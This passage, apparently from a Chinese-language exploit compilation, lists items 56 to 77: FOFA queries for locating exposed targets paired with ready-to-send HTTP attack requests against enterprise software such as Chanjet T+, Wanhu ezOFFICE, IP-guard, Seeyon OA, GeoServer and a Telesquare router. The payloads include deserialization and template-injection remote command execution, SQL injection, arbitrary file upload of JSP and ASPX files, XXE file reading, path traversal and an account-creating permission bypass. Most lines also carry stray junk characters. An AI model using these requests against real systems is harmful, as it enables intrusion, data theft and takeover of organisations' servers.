第一步,通过% G1 n1 @+ C& c9 `% V
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie/ Y- N: ~3 c& S8 J" f* f
第二步,利用获取到的Cookie请求
' f" ~* h! `( u6 u8 T+ Z8 o/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers! \# F7 z9 I4 F. j( @

4 ^, G4 _- t( L- r" a; B0 n$ G56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE) L( O3 Y! `8 g- d/ w( R1 t6 ~9 E
FOFA: app="畅捷通-TPlus"# ~" v2 b& r& {. f9 t3 B* g& I
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1. N7 t4 r+ v, S9 r
Host: x.x.x.x
) F7 O& V$ F$ `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.368 U  @! r2 I9 `
Content-Type: application/json
2 g3 C; Z  l4 a# r. v, B
" j! @% y, a8 V. B. R: v7 h6 T2 y  h{
$ f5 Z5 j" j( }* L  w) v$ }4 Q  "storeID":{2 n4 V8 V" B& }. r8 ?' b6 s# n
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",2 j3 r3 n8 W4 K1 e% o
   "MethodName":"Start",5 O! J) @6 q' S; `) j
    "ObjectInstance":{
0 x3 I/ m1 H% a1 J: Q* `* a' F- S       "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
" Q3 h0 A+ {$ X8 \& f% r% ]        "StartInfo": {
$ Z. O8 w8 n( C+ @           "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",) M& u) ~. g2 k1 b/ Q" V7 }8 O6 [0 l
           "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
8 R+ P! h: i; q. [% n4 V) E       }
. S& S! b0 L. H2 X/ |3 `* T* c    }
8 c& U  s+ O% i6 L" d+ c8 E; }  }
/ T# h1 ~! E% R- x}
+ a1 e2 w9 I) s! i: T" D! ?" k# x4 c8 C) e! H' ]7 X
) {' O4 H5 M. ?2 u. X- W  {$ [" M1 u
57. 畅捷通T+ keyEdit.aspx SQL注入
1 m7 R* u: E6 k( [. K$ ?  [FOFA:app="畅捷通-TPlus"
1 D8 g' O  I2 {% iGET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.16 u: s" s! R# g. {6 s6 ^' y) }) u
Host: host
7 a8 |4 J3 b4 z+ q8 ^$ M( B. BUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
3 n$ S8 V; P1 [& J- ]2 s! o& f2 ^Accept-Charset: utf-8
4 F, r, S  S: ^( A0 IAccept-Encoding: gzip, deflate% e: h; e# J2 a8 P- \5 I
Connection: close
) C" ~- {) q7 J
4 V( P* W% B0 _% t! V$ S# _1 r! ]; D
58. 畅捷通T+ KeyInfoList.aspx sql注入; P' C$ Z% c9 |. e0 O4 u2 X
FOFA:app="畅捷通-TPlus"! f5 C: n; F: }8 g% O* [
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
. P9 p' J3 L' d1 _, K: R7 E1 `: ]- \Host: your-ip  e' i3 S" k. Z' ]) r7 I
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36" T/ T" l  p. g0 N& X/ o
Accept-Charset: utf-8
) Y7 F, {+ z5 Y' f* B; W( v4 E+ F- JAccept-Encoding: gzip, deflate
# I/ g' `: _+ j( {! eConnection: close1 h/ q9 s) f: M0 P1 J7 S

* }& T; d! J8 f8 ~4 w+ }7 ?8 n# C. D$ c  \. N9 a* T4 h8 C  B
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
$ u- Y* s% ^. X* [; ^# F  o& j3 vFOFA: title="@XETUX" && title="XPOS" && body="BackEnd"$ e1 \) j0 w3 w6 h6 q
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
$ I7 ]4 u7 a1 Q$ q- qHost: 192.168.86.128:90904 v1 T$ m0 V5 K5 R! n, B; C: q" V# I
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36& T0 Z3 E0 @) ?- n  k* K- f% I! P7 d, {
Connection: close- G3 h3 d1 t* U0 P' @
Content-Length: 1669
! I: V$ E! q6 q6 C" s$ w! cAccept: */*8 Q9 B8 @. Q4 u& s3 N& @# U$ V1 M
Accept-Language: en
% e6 N/ T1 n. dContent-Type: application/x-www-form-urlencoded
& k; _, u+ y4 J' e# h5 R0 }2 |; ^2 aAccept-Encoding: gzip; @; N' M' h* X  x" i; m. t5 ~) O

; ~. H+ i; @4 _6 l% \& }5 W0 U$ S6 QPAYLOAD
) ~+ H. A% d+ R' N, A/ n$ l! S- J( Q- H' f

0 p( s. u& d$ H( v; A% U! N60. 百卓Smart管理平台 importexport.php SQL注入
! |( N  ]' a" E0 j: `1 y. T2 dFOFA:title="Smart管理平台"2 ]# V  D! O8 U( y6 o1 `" _3 Z
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
7 Y  {* t) @* p- W9 R6 XHost:: a( W0 L7 U/ D! T) i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
1 C" p9 S: s0 B6 VAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
5 F  }9 F5 t/ A7 }Accept-Encoding: gzip, deflate
& Y( T* n* |; p5 Q" t3 [$ fAccept-Language: zh-CN,zh;q=0.9
# B$ F) p' w, [/ M1 y+ GConnection: close1 ~8 k2 @2 K! _" C! p
# y' j4 U+ ~+ z, u7 _
) B) F2 b1 f2 }  N+ Q, c$ h
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
# r' |4 ~( j- o! N& }7 H1 s1 B( oFOFA: title="欢迎使用浙大恩特客户资源管理系统"
" J4 `% {# ^% I. ]POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
  \: B8 A& Q) k. }" s5 z! AHost: x.x.x.x7 x* ]7 q, N* ?
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15: X! ]( E! J! A" B/ y8 t: L
Connection: close; q; a: h& ?5 ]0 L
Content-Length: 27
+ U1 ]4 ?4 a8 X; v+ wAccept: */*' J8 o5 Q( o3 h+ v. r
Accept-Encoding: gzip, deflate
! _% c% m) c; @# oAccept-Language: en- `6 C) o8 L# o# s( s+ b
Content-Type: application/x-www-form-urlencoded4 Y8 w+ L; U5 @: D7 W8 ^- C

) H8 G2 M/ H+ u8uxssX66eqrqtKObcVa0kid98xa
4 H+ i; i' z. Z+ o
, B( H# s  ], @
4 O& J7 C& E! B( _$ r% W' C62. IP-guard WebServer 远程命令执行
4 M: \. h. A. T2 ^/ CFOFA:"IP-guard" && icon_hash="2030860561"
6 ^2 ?' F' y! HGET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
3 T6 ?2 L1 w1 |1 k1 LHost: x.x.x.x
! g7 P' A0 u6 y9 |; YUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.364 g; d- B( e3 C" M% B: K; a
Connection: close
: Q, b8 ~* {8 m' M/ ?: z4 ^7 kAccept: */*, u: D$ \) D6 r! D! j* z" W- G& S
Accept-Language: en2 d9 _+ w% P1 x4 D- J
Accept-Encoding: gzip
5 e5 F# o, G8 i9 B0 J; [
% s' [) X- d" w# U5 ~! |1 [6 t
8 c" e4 r7 C5 d5 J, j访问
- Q) A. C" E$ }! S2 [  i/ Y5 `/ P  m. p; l
GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1& ]6 h% j; U& _& c5 t; M2 M6 D
Host: x.x.x.x
+ @% j: Q% }# i0 Z# m" Y2 P" a7 ^
8 @  Y% ^. U2 @9 J1 [
' J! M- l6 Z* Q& ~+ B5 [4 ?# B$ q# J+ a63. IP-guard WebServer任意文件读取, s  u3 ]' i+ W
IP-guard < 4.82.0609.0/ T+ g2 r9 D. ?# H+ f" V" Y
FOFA:icon_hash="2030860561"
! ]+ S% s0 Q* Y' y' lPOST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
1 I* ?4 z" V9 x7 q( oHost: your-ip
- m& ~9 \8 i9 `0 TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
& A9 v  A7 {. j& p8 [7 z# d" QAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.77 y+ l& ^9 T1 g! G0 v
Accept-Encoding: gzip, deflate: E  ^0 `) h  l( O& [
Accept-Language: zh-CN,zh;q=0.9
) V3 F5 }9 H+ Q2 s$ zConnection: close
8 a6 I2 ?2 q$ a& o$ h5 J; jContent-Type: application/x-www-form-urlencoded
0 j1 w. \$ H0 x$ x% b1 q6 _# l
! ?$ _8 i% A( p5 Upath=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A
0 I( O" V, N2 A' P% G8 G3 `8 ]* j1 {, L" v: ], `( N
64. 捷诚管理信息系统CWSFinanceCommon SQL注入
; p3 S% y- r# q9 ~FOFA:body="/Scripts/EnjoyMsg.js"6 l5 \: S4 ~, U1 C
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
1 M: m7 b" V% X! z) H2 I4 I5 u0 FHost: 192.168.86.128:9001
- o/ ~( o& K+ XUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36* J* a. A1 \! \
Connection: close
5 U, R7 d/ i: C! P) _  l! LContent-Length: 369
  ^8 V% S2 W) }' ?Accept: */*
/ d6 a. K; a/ i6 v% k& _. ]Accept-Language: en9 V, @5 v4 o- T- ^& Y7 E2 b
Content-Type: text/xml; charset=utf-8
$ D1 c2 Z  Z# oAccept-Encoding: gzip$ c' H' G& T7 \4 B! C
; R; c. s' p1 }, o, ^6 G0 x* K
<?xml version="1.0" encoding="utf-8"?>
0 R* G* v/ {' n+ U: V5 R) r1 _& p<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">: ?5 Y: d0 d$ H
<soap:Body>$ t1 P4 |* d4 w! Z1 U6 l
    <GetOSpById xmlns="http://tempuri.org/">
" _- g. ^! ~0 e. B0 K      <sId>1';waitfor delay '0:0:5'--+</sId>
* k3 ?9 u* ]  A) V2 H    </GetOSpById>
; {4 ~8 j9 U1 N* V7 H5 i9 I0 _  </soap:Body>7 R$ t) L0 x1 q' j: b% G
</soap:Envelope>- q- I9 C" y; N. N

8 n& [5 X$ \5 v& m3 j
8 V+ f, L3 R( j2 N/ `65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
- `( {+ R* s0 T8 ^) b4 YFOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
1 C0 B' w3 }4 w响应200即成功创建账号test123456/123456
  S& B  [7 A1 W7 \* L( W* i. MPOST /SystemMng.ashx HTTP/1.1
3 _8 `5 L* Q- P- wHost:
7 b) g7 U' ^2 o1 T) d1 ~. p+ n5 kUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
6 K8 p' W; b. H5 b& f: M, rAccept-Encoding: gzip, deflate
, U! @! K2 P: lAccept: */*& P2 f$ C" z# u7 g/ y+ o* M* I: W
Connection: close" c" U5 c& v* {: `
Accept-Language: en
1 [- S! P) x" ]* n/ y: VContent-Length: 174
7 {6 E# p( k+ q7 |8 Y
9 u8 `7 s( U8 l3 ]operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators
0 ]& i6 m& J; W/ t4 y) I+ M( w2 P4 z, V% p4 u7 D
8 a' V) A; j+ D
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
$ A% _2 |2 H+ Q( A* R$ j, ~FOFA:app="万户ezOFFICE协同管理平台"" H" c! \2 h' n7 R' H
) m/ ^6 ^7 |6 _: x; a
GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
' D5 c$ f. g2 \6 K7 H+ H% `Host: x.x.x.x, \. F3 n- c* @
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.367 O! k) R* \( u; C$ v& y6 @/ V
Connection: close* I& e& L5 B7 N$ y% E
Accept: */*
1 V/ d8 Q$ R4 \9 @. LAccept-Language: en
  L# M, y$ p6 o" S$ J4 yAccept-Encoding: gzip
& Q/ \) h9 q  s- r1 U7 ^0 w: U0 d9 m

0 q( g9 q7 h' z第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在4 l( O& K8 y4 |8 B; O! D9 p

3 I3 N! ~( `8 G# Q- m$ v, o67. 万户ezOFFICE wpsservlet任意文件上传. w6 B/ ~# \6 k( u
FOFA:app="万户网络-ezOFFICE"
& V# h! S9 @6 s* onewdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型
5 w) v4 ^' E! D% Z8 w* x) S& rPOST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1  A: Q- E! }# T! `
Host: x.x.x.x! c; T2 Z" P" F3 U, g8 F5 K
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.06 j& C5 b* s. I$ j! Z  }8 F
Content-Length: 173
+ n) d: Y( ]1 A* y; v% m$ l: TAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.88 X* H) g# `* o$ `* g
Accept-Encoding: gzip, deflate
+ m1 x, e" t9 c' u8 H# f; T5 ~Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
* h( u; E. t9 {1 l! {5 KConnection: close! p& N; `, r7 t3 G; X  Y4 n7 ~
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp: T* S8 m5 y6 w
DNT: 1) D6 L$ r+ A7 R
Upgrade-Insecure-Requests: 1
1 V% E) u/ `" g" c0 v! h7 c% I7 C* ]" F1 a% |
--ufuadpxathqvxfqnuyuqaozvseiueerp
: A. D( Q; r# R# m% b% @% NContent-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"
2 y) |( d2 R5 ~2 C  V2 A4 U
; g5 v4 Z# ?( ?! B' L. m<% out.print("sasdfghjkj");%>
7 Q2 w8 }9 N" D: S, `8 G4 C--ufuadpxathqvxfqnuyuqaozvseiueerp--; W# P1 {- b1 }0 j

$ w7 N  `" E8 c' z- R2 G
$ O! J3 A# n# e7 V# d3 ~文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp
2 J. |- f, C* `, @3 U
$ H1 [: C, P  D0 r68. 万户ezOFFICE wf_printnum.jsp SQL注入$ g! H4 s, e6 T" g2 [
FOFA:app="万户ezOFFICE协同管理平台"
0 K) S! x% t2 VGET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1/ [6 ]2 l" R3 M+ |/ V) ~+ O
Host: {{host}}( i5 R9 n- b3 j1 B& `# N: @/ A1 ~
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36  l( E1 ?# F" Y7 [9 _
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8* F* \9 P, Q% A2 J& s/ r+ q
Accept-Encoding: gzip, deflate9 G& r6 ~. c% y* x$ a0 b; [2 I
Accept-Language: zh-CN,zh;q=0.9/ p; l; c- e4 K; m
Connection: close2 F- E" V; Z" J. o0 G, s

- J+ e  s) A! P8 e7 _* ?/ J
; L6 |0 S# R& [2 y% Q$ g69. 万户 ezOFFICE contract_gd.jsp SQL注入
4 O( a6 a/ ~5 ?( n8 ^% m, OFOFA:app="万户ezOFFICE协同管理平台"
3 d5 |5 p2 E* [( h" V( b% iGET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
- X* r; x1 n0 i/ xHost: your-ip
; [& X& U" q- n; MUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
4 Z: \9 ]  B% p$ Z/ h3 QAccept-Encoding: gzip, deflate2 B, p4 \( J( u+ r; h
Accept: */*
9 r5 y! X  M  }; d! T1 G4 n: BConnection: keep-alive% A& x1 B* y: Z% E$ b4 c7 v, U* I1 h

8 N7 \& K; r' n4 u: M- ~4 a; m& g; C: T+ a! ~, d
70. 万户ezEIP success 命令执行
" P  q) S7 q0 C5 _3 w9 h4 wFOFA:app="万户网络-ezEIP"* h# Y" y3 R1 c% K
POST /member/success.aspx HTTP/1.1
8 L' O6 U. {' e6 r% H5 V# mHost: {{Hostname}}
# ?; O( P3 y9 q7 j1 B& N3 V$ kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
6 r: Q5 R% W7 y) w7 [4 YSID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
2 x+ m0 s1 U: vContent-Type: application/x-www-form-urlencoded) Z8 K+ D3 w5 K( l6 }% p3 W% Z
TYPE: C
9 B+ |  D% {6 Q( b( o5 P+ rContent-Length: 167024 u6 ~9 ]9 W1 H( ?! S" x# g

9 q; W5 E7 l) Q3 e+ e__VIEWSTATE=PAYLOAD# R; ?5 E- ?3 Z# Q
- u) ~2 G& d- _3 ]/ f' s
( C1 `2 z) L7 Z* B
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入7 M* f- v- P+ f9 b
FOFA:body="PM2项目管理系统BS版增强工具.zip"3 I. |8 q8 v0 F
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.11 ^: N" e- L; o9 p: p
Host: x.x.x.xx.x.x.x
' z/ ]- A, {. w0 [5 DUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
7 b) O: Z8 _7 |; J9 ]1 X9 f+ W5 eConnection: close
& {0 M& [- Q5 }" ZAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  q6 S2 s  d* y, l
Accept-Encoding: gzip, deflate% B9 M7 K% B+ ?
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
, k0 U0 p1 W) Y0 b7 ^. _: }Upgrade-Insecure-Requests: 1
! R& j) Z  e+ p/ u# M" E2 s
* ^. d6 z# ]6 \! g9 K; E% m6 c  Y8 ^( ~9 P, A
72. 致远OA getAjaxDataServlet XXE' r) h5 }& j/ Q# L
FOFA:app="致远互联-OA"
4 |: D+ I+ g' {+ V) j9 SPOST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
* ]1 }- f8 S; T' P* U: K; D1 cHost: 192.168.40.131:80991 V" z  j* z, N2 e+ u, i5 O7 V2 k
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.361 I* ~3 r- G) c' O
Connection: close* a7 C' X) ]& N4 `, u5 I# i; K
Content-Length: 583- U% j# V$ Q9 d9 b1 p" h
Content-Type: application/x-www-form-urlencoded# q6 i. |6 ~& A0 f# c. K' A; Y
Accept-Encoding: gzip$ `: D: @" i9 f) k0 B% f' j

( E. z) q* J% L" sS=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E
2 w$ H0 F2 h- s8 [- Y, I* @/ v8 }# f. u& A4 o% v! \; v, ^$ @

) I7 v9 b9 ^' _: @/ M1 z& r8 L73. GeoServer wms远程代码执行2 L8 I+ b, J& d! V) o
FOFA:icon_hash=”97540678”& q, J. B6 K7 f0 q( q6 a
POST /geoserver/wms HTTP/1.1; n3 K/ Q) X7 N8 ~/ b0 A
Host:
/ ]$ L' H+ H5 }# w( P- H6 dUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
$ E+ g% O  u) `- Y' ?; `Content-Length: 19810 H* A! i& a/ D3 H- W: K0 x
Accept-Encoding: gzip, deflate4 R/ {- m4 Q( i2 B
Connection: close3 p2 u5 s) t8 L- s9 M) J2 n# C
Content-Type: application/xml
% f1 Z$ S) X! eSL-CE-SUID: 3
/ R: i, ?. |5 ]+ }" ~7 {
8 Y; n/ T) N) DPAYLOAD
) K0 e( K" a& y3 O1 X9 ^0 Q5 n4 J5 ^
5 }1 w) T+ n  E! B; n4 z
74. 致远M3-server 6_1sp1 反序列化RCE
7 g6 o1 }( j" k* V% zFOFA:title="M3-Server"6 B9 b& \# F- F2 _- Z  W4 _
PAYLOAD7 f. L/ H1 {) ]5 ?# U: H
  v5 C* L; _$ Z
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE3 y6 M. ]9 H) M! L3 e( w
FOFA:app="TELESQUARE-TLR-2005KSH"
0 u. Z' m( e- D" z8 [GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1, W5 \- w' {$ g$ H# V
Host: x.x.x.x
' C9 d' ^! w6 F/ EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36) R( I( w* I1 ~% A# K  ~' e5 g
Connection: close
! j( m# h2 ]" s! C6 x, lAccept: */*$ o% `! h+ q9 ]8 ~$ @" }. E
Accept-Language: en3 U$ K& K& q: o+ G# j6 v) K
Accept-Encoding: gzip) A0 P) h- g! D5 _4 ^/ e4 J

* `( p- i6 B  @5 r3 l; B0 I; M/ H& h: b% O! F
GET /cgi-bin/test28256.txt HTTP/1.17 x  w; o+ Q5 {9 V4 F! X2 R6 c9 Y
Host: x.x.x.x2 U: s& }4 H: K0 K% t

# V) \* ?8 l, S8 R5 z+ i% Y5 {) G
( ~* O0 B. s& A& T$ o* o* K  r7 B76. 新开普掌上校园服务管理平台service.action远程命令执行0 @- Y/ g% @  X8 L' r; e- h
FOFA:title="掌上校园服务管理平台"
' a$ s$ P+ J; }' D2 ^1 SPOST /service_transport/service.action HTTP/1.1* S( M' I3 K- N/ D
Host: x.x.x.x3 H4 }* r  d% U- f& y. R/ f4 ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
+ b1 l+ B8 \+ _: |( S8 {+ VConnection: close
  ^& U  z! H- O9 z- g0 e+ vContent-Length: 211
, ]2 [1 P4 p* V7 p4 H' Y8 sAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' Z6 y2 b  Y% G
Accept-Encoding: gzip, deflate( s" u+ I3 `, I) G3 K
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2" g$ @$ i  b$ E/ O* \+ ]3 x4 _+ ~
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
( p2 Z) W* A; l- K4 ]2 dUpgrade-Insecure-Requests: 15 X/ H1 N% z) x2 P' X3 W* [5 Q9 c
7 b: T: X5 z& K
{. W. T) d$ c4 M/ v
"command": "GetFZinfo",
9 N' B; V1 k) A1 ^4 H) {' c  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
* F. \1 p- m! H" n  c  ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
9 _4 Z/ ]" N: \9 X- Y& D6 n- _}, B0 U8 m* t; w

9 s3 `, u* @" s+ T& p2 u& w- ?) j
# a2 Z0 t) d  H8 Z# uGET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
/ y8 i4 J1 l9 Z# L; j. GHost: x.x.x.x3 u* a% H0 J2 ?: B) t9 [. g

' I# `9 |1 a, K0 v
  y$ R* x5 A6 c1 @. U: }' t
; o, ?* n* C% v2 x2 E+ I; l77. F22服装管理软件系统UploadHandler.ashx任意文件上传
7 G4 g1 u+ w2 Q8 a6 sFOFA:body="F22WEB登陆"' D+ @) E0 U0 r% A) x" M+ b
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1  a0 V; p$ H+ \" y
Host: x.x.x.x& R/ P9 Q8 |7 I7 ~- r0 u3 k6 V3 Q
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
% V( a8 Z, A3 U; P3 l  sConnection: close
7 o0 T5 W# m* a: }6 @8 r/ ]$ f3 s9 dContent-Length: 433" O3 I& [$ X6 K% Y6 U1 n
Accept: */*% A" K1 y% E8 k0 g3 e3 G. r
Accept-Encoding: gzip, deflate
, ~1 `, T/ Q1 C4 V+ cAccept-Language: zh-CN,zh;q=0.94 Z4 _! W, m" R$ z, @* t
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix
! J  H5 ^0 P2 \. [( @' W/ Q' R, q1 g# [
------------398jnjVTTlDVXHlE7yYnfwBoix4 U# j( a% D: b, L
Content-Disposition: form-data; name="folder"
7 o2 v) ^6 D& m5 U  u) q) }9 T7 r+ W! }+ ]% b1 R1 ?0 v
/upload/udplog6 D$ i2 u% m0 P4 F/ t' p, Z
------------398jnjVTTlDVXHlE7yYnfwBoix9 H8 Q8 [  X' O) Y$ w- a
Content-Disposition: form-data; name="Filedata"; filename="1.aspx". U7 y$ D8 F& ]) T5 h8 c# C# `
Content-Type: application/octet-stream; Y( o4 [$ |$ T8 [7 l* L

& x% Y8 U7 \' D% qhello12345676 y/ o) m; J, G2 \4 `& }4 c9 }2 t
------------398jnjVTTlDVXHlE7yYnfwBoix: i2 v6 s; S# g9 m
Content-Disposition: form-data; name="Upload"
* _5 {' R% O2 G: H7 ]& g# E0 q! y
/ S( M% l6 `. iSubmit Query' z# N) J" @4 j$ [
------------398jnjVTTlDVXHlE7yYnfwBoix--: v, @' q0 T* V6 |  L1 A1 S0 Y3 o
+ _- N! m* A* U  s9 b6 k: b; g" b
